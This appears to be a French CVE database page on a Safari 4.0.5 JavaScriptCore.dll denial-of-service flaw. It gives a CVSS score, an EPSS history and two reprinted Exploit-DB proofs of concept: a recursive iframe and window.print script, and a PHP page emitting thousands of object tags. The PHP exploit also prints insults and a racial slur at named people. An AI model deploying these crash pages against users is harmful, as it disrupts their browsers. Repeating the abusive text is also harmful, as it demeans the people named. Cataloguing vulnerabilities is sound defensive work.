CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the
Informations du CVE
Faiblesses connexes
CWE-ID
Nom de la faiblesse
Source
CWE Other
No informations.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
4.3
AV:N/AC:M/Au:N/C:N/I:N/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
4.19%
–
–
2022-04-03
–
–
4.19%
–
–
2022-07-17
–
–
4.19%
–
–
2023-03-12
–
–
–
0.63%
–
2023-08-27
–
–
–
0.74%
–
2023-09-10
–
–
–
0.74%
–
2023-11-19
–
–
–
0.63%
–
2024-02-11
–
–
–
0.9%
–
2024-03-17
–
–
–
1%
–
2024-06-02
–
–
–
1.2%
–
2024-06-02
–
–
–
1.2%
–
2024-08-25
–
–
–
1.2%
–
2024-09-22
–
–
–
0.9%
–
2024-09-29
–
–
–
1.02%
–
2024-11-03
–
–
–
1.25%
–
2024-12-22
–
–
–
1.65%
–
2025-02-16
–
–
–
1.65%
–
2025-01-19
–
–
–
1.65%
–
2025-02-16
–
–
–
1.65%
–
2025-03-18
–
–
–
–
3.52%
2025-03-30
–
–
–
–
3.83%
2025-03-30
–
–
–
–
3.83,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-05-02 22h00 +00:00 Auteur : Mathias Karlsson EDB Vérifié : No
<html>
<---------------------
Crash Report
Problem Event Name: APPCRASH
Application Name: Safari.exe
Application Version: 5.31.22.7
Application Timestamp: 4b8f94fa
Fault Module Name: JavaScriptCore.dll
Fault Module Version: 5.31.22.5
Fault Module Timestamp: 4b8cb88c
Exception Code: c00000fd
Exception Offset: 000889f7
OS Version: 6.1.7600.2.0.0.256.48
Locale ID: 1053
Additional Information 1: d4bb
Additional Information 2: d4bb5342a8501f1ef1ad79845414ed25
Additional Information 3: 57f4
Additional Information 4: 57f4717a3dd18c61a213b49009cb5bb7
Tested on: Microsoft Windows 7
By: Mathias Karlsson
URL: http://h.ackack.net/
Note:
If you set the iframe src property to an external document containing the window.print(), the user does not have to press away the first print popup.
---------------------->
<script>
window.print();
a();
function a()
{
setInterval(b,0);
}
function b()
{
var c = document.createElement("iframe");
c.setAttribute("src",document.location);
document.getElementsByTagName("body")[0].appendChild(c);
setInterval(a,0);
}
</script>
</html>
Date de publication : 2010-03-21 23h00 +00:00 Auteur : 3lkt3F0k4 EDB Vérifié : Yes
<?php
/***************************************************************************
[TITLE]: SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)
[OS]: WINDOWS XP SP3
[DOWNLOAD]: http://www.apple.com/es/safari/download/
[AUTHOR]: 3lkt3F0k4
[CONTACT]: 3lkt3F0k4[i_love_spam]gmail[i_love_spam]com
-------------------------CRASH DUMP SNIP------------------------------------
Executable search path is:
Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
Machine Name:
Debug session time: Sun Mar 21 23:34:38.000 2010 (GMT+1)
System Uptime: not available
Process Uptime: 0 days 0:01:54.000
................................................................
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(d94.d98): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=01417ea0 edx=0000000a esi=00011ae2 edi=7ff90240
eip=0137b267 esp=00128c50 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for JavaScriptCore.dll -
JavaScriptCore!JSC::CString::~CString+0x40d7:
0137b267 c705efbeadbb00000000 mov dword ptr ds:[0BBADBEEFh],0 ds:0023:bbadbeef=????????
-------------------------CRASH DUMP SNIP------------------------------------
***************************************************************************/
$fuzz=str_repeat("<object>",10000);
echo "<title>SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)</title>";
echo "<center><b><font color='#ff0000'>Wait please...Crash is coming...</font><br><br><br>";
echo "Spanish message for my friends:<br>";
echo "0wn3Dsss!!<br>";
echo "TiTo MC es un negro cabron que rapea como el puto culo.<br>";
echo "Chema Alonso a.k.a. maligno a.k.a. neo payaso MS.<br>";
echo "Eres vergonzoso, penoso, lamo, n44b, l3l,...<br>";
echo "Tus reflexiones son tristes y pobres, vas a comision? das pena chaval!<br>";
echo "Putos focaaaas!<br><br>";
echo "Greetz to my team: Spanishiit Team. Welcome everyone!<br>";
echo "We'll come back fucking more people...Sure!<br><br><br>";
echo "<hr width='80%' />";
echo "<font color='#ff0000'>I <3 Rooted CON 2010. Next year more! (shhhhhh)</font></center>";
echo $fuzz;
?>